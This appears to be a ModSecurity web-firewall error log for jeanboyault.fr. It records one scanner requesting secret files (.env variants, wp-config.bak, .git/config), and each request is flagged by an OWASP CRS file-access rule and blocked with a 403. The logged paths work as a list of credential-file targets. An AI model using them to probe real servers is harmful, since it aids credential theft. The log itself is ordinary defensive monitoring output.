[Mon May 11 11:41:34.433960 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:39610] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ws/.env.prod5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/ws/.env.prod5"] [unique_id "agGkTkYQeUtAPynIs6xUswAAAAM"]
[Mon May 11 11:41:34.434185 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:39610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/ws/.env.prod5"] [unique_id "agGkTkYQeUtAPynIs6xUswAAAAM"]
[Mon May 11 11:41:35.598217 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:39610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkTkYQeUtAPynIs6xUswAAAAM"]
[Mon May 11 11:41:35.624604 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:39618] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ws/.env.prod5"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/ws/.env.prod5"] [unique_id "agGkTxjZymfuKpjWXeh5OQAAAM8"]
[Mon May 11 11:41:35.625209 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:39618] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/ws/.env.prod5"] [unique_id "agGkTxjZymfuKpjWXeh5OQAAAM8"]
[Mon May 11 11:41:36.853684 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:39618] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkTxjZymfuKpjWXeh5OQAAAM8"]
[Mon May 11 11:41:41.821671 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:39654] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /ws/wp-config.bak.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/ws/wp-config.bak.test"] [unique_id "agGkVURdw2n9wv6Ai48EYwAAAJA"]
[Mon May 11 11:41:41.821882 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:39654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/ws/wp-config.bak.test"] [unique_id "agGkVURdw2n9wv6Ai48EYwAAAJA"]
[Mon May 11 11:41:44.957663 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:39654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkVURdw2n9wv6Ai48EYwAAAJA"]
[Mon May 11 11:41:44.983863 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:20010] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /ws/wp-config.bak.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/ws/wp-config.bak.test"] [unique_id "agGkWJkIEwRJMyDaV55LQAAAAUc"]
[Mon May 11 11:41:44.984501 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:20010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/ws/wp-config.bak.test"] [unique_id "agGkWJkIEwRJMyDaV55LQAAAAUc"]
[Mon May 11 11:41:46.597837 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:20010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkWJkIEwRJMyDaV55LQAAAAUc"]
[Mon May 11 11:41:46.624319 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:20018] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGkWmS6k_SCYd1AVZqrBwAAAQU"]
[Mon May 11 11:41:46.624530 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:20018] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGkWmS6k_SCYd1AVZqrBwAAAQU"]
[Mon May 11 11:41:49.479076 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:20018] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkWmS6k_SCYd1AVZqrBwAAAQU"]
[Mon May 11 11:41:49.507035 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:20028] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGkXb4KNmD_mZ_vlf807AAAAFA"]
[Mon May 11 11:41:49.507251 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:20028] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGkXb4KNmD_mZ_vlf807AAAAFA"]
[Mon May 11 11:41:51.364498 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:20028] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkXb4KNmD_mZ_vlf807AAAAFA"]
[Mon May 11 11:42:35.293957 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:15804] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/.env.local"] [unique_id "agGki5kIEwRJMyDaV55LbAAAAUA"]
[Mon May 11 11:42:35.294530 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:15804] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/.env.local"] [unique_id "agGki5kIEwRJMyDaV55LbAAAAUA"]
[Mon May 11 11:42:36.477464 2026] [security2:error] [pid 1256241:tid 1256246] [client 185.177.72.9:15804] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGki5kIEwRJMyDaV55LbAAAAUA"]
[Mon May 11 11:42:36.503492 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:15808] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/app/.env.local"] [unique_id "agGkjL4KNmD_mZ_vlf81IAAAAEQ"]
[Mon May 11 11:42:36.503805 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:15808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/app/.env.local"] [unique_id "agGkjL4KNmD_mZ_vlf81IAAAAEQ"]
[Mon May 11 11:42:37.726831 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:15808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkjL4KNmD_mZ_vlf81IAAAAEQ"]
[Mon May 11 11:42:37.755460 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:15816] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/.env.production"] [unique_id "agGkjUYQeUtAPynIs6xVRgAAAAI"]
[Mon May 11 11:42:37.756356 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:15816] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/.env.production"] [unique_id "agGkjUYQeUtAPynIs6xVRgAAAAI"]
[Mon May 11 11:42:38.983459 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:15816] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkjUYQeUtAPynIs6xVRgAAAAI"]
[Mon May 11 11:42:39.010346 2026] [security2:error] [pid 1254133:tid 1254159] [client 185.177.72.9:15832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/app/.env.production"] [unique_id "agGkjxjZymfuKpjWXeh5cgAAANc"]
[Mon May 11 11:42:39.010567 2026] [security2:error] [pid 1254133:tid 1254159] [client 185.177.72.9:15832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/app/.env.production"] [unique_id "agGkjxjZymfuKpjWXeh5cgAAANc"]
[Mon May 11 11:42:40.242280 2026] [security2:error] [pid 1254133:tid 1254159] [client 185.177.72.9:15832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkjxjZymfuKpjWXeh5cgAAANc"]
[Mon May 11 11:42:40.270459 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:15846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/opt/.env"] [unique_id "agGkkL4KNmD_mZ_vlf81LQAAAEM"]
[Mon May 11 11:42:40.271237 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:15846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/opt/.env"] [unique_id "agGkkL4KNmD_mZ_vlf81LQAAAEM"]
[Mon May 11 11:42:41.439417 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:15846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkkL4KNmD_mZ_vlf81LQAAAEM"]
[Mon May 11 11:42:41.466620 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:15856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env"] [unique_id "agGkkWS6k_SCYd1AVZqrlAAAAQ8"]
[Mon May 11 11:42:41.468095 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:15856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env"] [unique_id "agGkkWS6k_SCYd1AVZqrlAAAAQ8"]
[Mon May 11 11:42:42.679138 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:15856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkkWS6k_SCYd1AVZqrlAAAAQ8"]
[Mon May 11 11:42:42.705558 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:15858] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/srv/.env"] [unique_id "agGkkr4KNmD_mZ_vlf81NwAAAEY"]
[Mon May 11 11:42:42.705764 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:15858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/srv/.env"] [unique_id "agGkkr4KNmD_mZ_vlf81NwAAAEY"]
[Mon May 11 11:42:43.905646 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:15858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkkr4KNmD_mZ_vlf81NwAAAEY"]
